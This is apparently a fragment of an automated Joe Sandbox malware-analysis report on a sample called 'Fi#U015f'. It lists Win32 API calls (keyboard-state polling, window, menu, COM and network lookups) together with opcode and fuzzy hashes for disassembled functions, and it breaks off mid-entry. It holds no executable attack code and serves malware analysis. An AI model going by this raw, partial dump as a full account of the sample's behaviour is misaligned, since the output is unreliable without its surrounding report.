                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: 83d187002ad25583d3fed09ab9227e1dee96d2f2e65f3bbf2eb2176b0112fda7
                                                        • Instruction ID: a119515529844c5d2e5e9e018e67f5bd7f7e608b20e46625b02d7ba8649621d3
                                                        • Opcode Fuzzy Hash: 83d187002ad25583d3fed09ab9227e1dee96d2f2e65f3bbf2eb2176b0112fda7
                                                        • Instruction Fuzzy Hash: B1B1E775A00208AFDB14DFA4C888DAEBBF9FF48304B149469F909EB251DB71EE45CB50
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00E82ED6
                                                        • SetKeyboardState.USER32(?), ref: 00E82F41
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E82F61
                                                        • GetKeyState.USER32(000000A0), ref: 00E82F78
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E82FA7
                                                        • GetKeyState.USER32(000000A1), ref: 00E82FB8
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E82FE4
                                                        • GetKeyState.USER32(00000011), ref: 00E82FF2
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E8301B
                                                        • GetKeyState.USER32(00000012), ref: 00E83029
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E83052
                                                        • GetKeyState.USER32(0000005B), ref: 00E83060
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 05a609b4faa8d23c041e83580003f8c268e5cdd86cf991317f0f3e020b1e84c7
                                                        • Instruction ID: 28d3bdfe9a21785e39aa30dec4ae270eb94966c367f84f7b186ca2fa38cdd565
                                                        • Opcode Fuzzy Hash: 05a609b4faa8d23c041e83580003f8c268e5cdd86cf991317f0f3e020b1e84c7
                                                        • Instruction Fuzzy Hash: 2A51D870A0878429FB35FBB488107EABBF45F11748F08559EC6CE7A1C2DA549B4CC765
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00E7ED1E
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E7ED30
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E7ED8E
                                                        • GetDlgItem.USER32(?,00000002), ref: 00E7ED99
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E7EDAB
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E7EE01
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E7EE0F
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E7EE20
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E7EE63
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E7EE71
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E7EE8E
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00E7EE9B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 56ee482c4bf5cb1aaf46f63c9daf598ca606b1915da46eee83ba79111f685b24
                                                        • Instruction ID: 674cfc300a2b327385bd013d4018b93d00008dd85aa47f8a08efa42cc47e69ed
                                                        • Opcode Fuzzy Hash: 56ee482c4bf5cb1aaf46f63c9daf598ca606b1915da46eee83ba79111f685b24
                                                        • Instruction Fuzzy Hash: 6F512F71B00205AFDB18CF69DD85EAEBBBAEB88304F148579F51AE7290D7719D05CB10
                                                        APIs
                                                          • Part of subcall function 00E5B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E5B759,?,00000000,?,?,?,?,00E5B72B,00000000,?), ref: 00E5BA58
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E5B72B), ref: 00E5B7F6
                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00E5B72B,00000000,?,?,00E5B2EF,?,?), ref: 00E5B88D
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00EBD8A6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E5B72B,00000000,?,?,00E5B2EF,?,?), ref: 00EBD8D7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E5B72B,00000000,?,?,00E5B2EF,?,?), ref: 00EBD8EE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E5B72B,00000000,?,?,00E5B2EF,?,?), ref: 00EBD90A
                                                        • DeleteObject.GDI32(00000000), ref: 00EBD91C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 5e6fcf928fe34c8b4531cbc15aef04eefad516b51998ee7ce05fdf70964a2039
                                                        • Instruction ID: 4ebcea26350a4fb09b30d473abbc3256d422c54bca07958f5b1cb5732f658603
                                                        • Opcode Fuzzy Hash: 5e6fcf928fe34c8b4531cbc15aef04eefad516b51998ee7ce05fdf70964a2039
                                                        • Instruction Fuzzy Hash: CF61BF30505600DFDB299F19DC88B66B7F5FF8431AF142A2EE846A7970C772A899DF40
                                                        APIs
                                                          • Part of subcall function 00E5B526: GetWindowLongW.USER32(?,000000EB), ref: 00E5B537
                                                        • GetSysColor.USER32(0000000F), ref: 00E5B438
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 7eb89fa2e550c46ceb73c811744c9fb47057f11233b0890801cee480ca49039c
                                                        • Instruction ID: 128cf21d61b159b2c176e2ea261cbd0a6726cdafd8ba065eb17456d412063b1e
                                                        • Opcode Fuzzy Hash: 7eb89fa2e550c46ceb73c811744c9fb47057f11233b0890801cee480ca49039c
                                                        • Instruction Fuzzy Hash: 3141C030005104AFDB305F29DC89BB93B66AB05726F189675FD75AA1E2E7328C4AD721
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                        • String ID:
                                                        • API String ID: 136442275-0
                                                        • Opcode ID: f2b3da7b0393edd2c0988664f62f2c9d14660c9377dd1c013987ece43dae8106
                                                        • Instruction ID: 79d51a625d48491bd9cd305e66c7fc4fd2cb7f4bce5172531828ce9d8166b4f9
                                                        • Opcode Fuzzy Hash: f2b3da7b0393edd2c0988664f62f2c9d14660c9377dd1c013987ece43dae8106
                                                        • Instruction Fuzzy Hash: AB41FC7688512CAECB65EB94DC45DDBB3BCEB44340F0061E6B659B2051EA30ABE58B50
                                                        APIs
                                                        • CharLowerBuffW.USER32(00EDDC00,00EDDC00,00EDDC00), ref: 00E8D7CE
                                                        • GetDriveTypeW.KERNEL32(?,00EF3A70,00000061), ref: 00E8D898
                                                        • _wcscpy.LIBCMT ref: 00E8D8C2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: db5c02486ca474ea75bcf7d312c4c8ce8bb30872f242a32c19da330fbf033751
                                                        • Instruction ID: 0a163d986db413b16c748b529e7524e500e130d89505d5892c9ccb05e693eb98
                                                        • Opcode Fuzzy Hash: db5c02486ca474ea75bcf7d312c4c8ce8bb30872f242a32c19da330fbf033751
                                                        • Instruction Fuzzy Hash: 51514E311082449FC714EF14DC92AAAB7E5EF85314F10A92DF99E772A2DB71DE09CB42
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00E493AB
                                                        • __itow.LIBCMT ref: 00E493DF
                                                          • Part of subcall function 00E61557: _xtow@16.LIBCMT ref: 00E61578
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_xtow@16
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 1502193981-2263619337
                                                        • Opcode ID: a4ee8a744d0c5f35e43efc30b10daeb80492e5e78ead944eb0988d566b2f3eaf
                                                        • Instruction ID: 7f3dd66258255749cd93d15a392a46c2f78cd41097797927f20b89d199b6ba71
                                                        • Opcode Fuzzy Hash: a4ee8a744d0c5f35e43efc30b10daeb80492e5e78ead944eb0988d566b2f3eaf
                                                        • Instruction Fuzzy Hash: DD41E571500204ABEB24DF74E942EBBB7E8EF49344F24646AE54AF71D3EA31E941CB11
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EAA259
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00EAA260
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EAA273
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EAA27B
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAA286
                                                        • DeleteDC.GDI32(00000000), ref: 00EAA28F
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EAA299
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EAA2AD
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EAA2B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: 35ba31ecf3601b0f50ae626ba5af912370a7c7b735651503aa82d6bff26d59c7
                                                        • Instruction ID: 5735aad78daf3d0e7af3964e71ff73044b3a35eaae834ad2d80e585c4f4713d5
                                                        • Opcode Fuzzy Hash: 35ba31ecf3601b0f50ae626ba5af912370a7c7b735651503aa82d6bff26d59c7
                                                        • Instruction Fuzzy Hash: 1F317C31105215AFDB215FA5DC49FEA3B69FF0E364F140238FA19B61A0C732E825DB64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 2620052-3771769585
                                                        • Opcode ID: d8f51451a852830cc87b5f0b445a78058cb69be1228198479c2ea5fc2b87a3e6
                                                        • Instruction ID: 99877e1df1f1aeb0346e2c1fcb83151dd2aa20f22ed2417af60c0bec3f0aef9e
                                                        • Opcode Fuzzy Hash: d8f51451a852830cc87b5f0b445a78058cb69be1228198479c2ea5fc2b87a3e6
                                                        • Instruction Fuzzy Hash: 3511E472A08218AFCB25BB71AC0AEDA77ACEF40714F011176F64DB6081EF71DA858B50
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E65047
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        • __gmtime64_s.LIBCMT ref: 00E650E0
                                                        • __gmtime64_s.LIBCMT ref: 00E65116
                                                        • __gmtime64_s.LIBCMT ref: 00E65133
                                                        • __allrem.LIBCMT ref: 00E65189
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E651A5
                                                        • __allrem.LIBCMT ref: 00E651BC
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E651DA
                                                        • __allrem.LIBCMT ref: 00E651F1
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E6520F
                                                        • __invoke_watson.LIBCMT ref: 00E65280
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                        • Instruction ID: 93361a1eb19e6e0a0b0a90f35a3b561e169fab703f9b18f9409671102f842d7a
                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                        • Instruction Fuzzy Hash: 5371E673B81F17ABD7149E68DC51B6AB3F8AF503A8F14922AF514F6281E770D9408BD0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E84DF8
                                                        • GetMenuItemInfoW.USER32(00F01708,000000FF,00000000,00000030), ref: 00E84E59
                                                        • SetMenuItemInfoW.USER32(00F01708,00000004,00000000,00000030), ref: 00E84E8F
                                                        • Sleep.KERNEL32(000001F4), ref: 00E84EA1
                                                        • GetMenuItemCount.USER32(?), ref: 00E84EE5
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00E84F01
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00E84F2B
                                                        • GetMenuItemID.USER32(?,?), ref: 00E84F70
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E84FB6
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E84FCA
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E84FEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: bc16968b7cbce74dc6f3f8414fdba5554ad5e444282e9a153ac4cfb0974772f7
                                                        • Instruction ID: 775327b4ea07683c7f47358e027c54d8567b0df599d44303afce13ba6cdc346e
                                                        • Opcode Fuzzy Hash: bc16968b7cbce74dc6f3f8414fdba5554ad5e444282e9a153ac4cfb0974772f7
                                                        • Instruction Fuzzy Hash: 1B616EB1A0024AAFDB11EFA4DC84EAE7BA8FB45308F142169F54DB7291D731AD45DB20
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EA9C98
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EA9C9B
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EA9CBF
                                                        • _memset.LIBCMT ref: 00EA9CD0
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EA9CE2
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EA9D5A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 8af57b5af33ce3f68a95fbee95351d235ac912aae834031003d33b05bbf710d4
                                                        • Instruction ID: 9c3ab1856e26242632f03716a12d6f60a79bfad626ba2453cca667d0397b692f
                                                        • Opcode Fuzzy Hash: 8af57b5af33ce3f68a95fbee95351d235ac912aae834031003d33b05bbf710d4
                                                        • Instruction Fuzzy Hash: B1616B75900208AFDB11DFA8CC81EEEB7F8FF09714F144159FA05AB292D771A942DB50
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00E794FE
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00E79549
                                                        • VariantInit.OLEAUT32(?), ref: 00E7955B
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E7957B
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E795BE
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E795D2
                                                        • VariantClear.OLEAUT32(?), ref: 00E795E7
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00E795F4
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E795FD
                                                        • VariantClear.OLEAUT32(?), ref: 00E7960F
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E7961A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 8f1dfada16214c390c87489b32a62a33197da9aedee3c76463f195d4a871aaa4
                                                        • Instruction ID: f0ca27255665717d58e888a569f5b710b876ae6136560e9bbf114a095440e9c9
                                                        • Opcode Fuzzy Hash: 8f1dfada16214c390c87489b32a62a33197da9aedee3c76463f195d4a871aaa4
                                                        • Instruction Fuzzy Hash: E8413D31900219AFCB05EFA5DC44DDEBBB9FF08355F008475E956B7251DB32AA4ACBA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?$|?
                                                        • API String ID: 2862541840-300242882
                                                        • Opcode ID: d61abea1e8398c4a94caca940d6ef9f1eac1bc45bc2fbf22fcaf6c4e569097d9
                                                        • Instruction ID: 4a702cac8d3fa466820d282cd4d09621729391cc34f069d627c72407b430cf9d
                                                        • Opcode Fuzzy Hash: d61abea1e8398c4a94caca940d6ef9f1eac1bc45bc2fbf22fcaf6c4e569097d9
                                                        • Instruction Fuzzy Hash: F691BD71A00219ABCF24CFA5ED44FEEBBB8EF84714F109519F515BB280DB709944CBA0
                                                        APIs
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • CoInitialize.OLE32 ref: 00E9ADF6
                                                        • CoUninitialize.OLE32 ref: 00E9AE01
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00ECD8FC,?), ref: 00E9AE61
                                                        • IIDFromString.OLE32(?,?), ref: 00E9AED4
                                                        • VariantInit.OLEAUT32(?), ref: 00E9AF6E
                                                        • VariantClear.OLEAUT32(?), ref: 00E9AFCF
                                                        Strings
                                                        Memory Dump Source
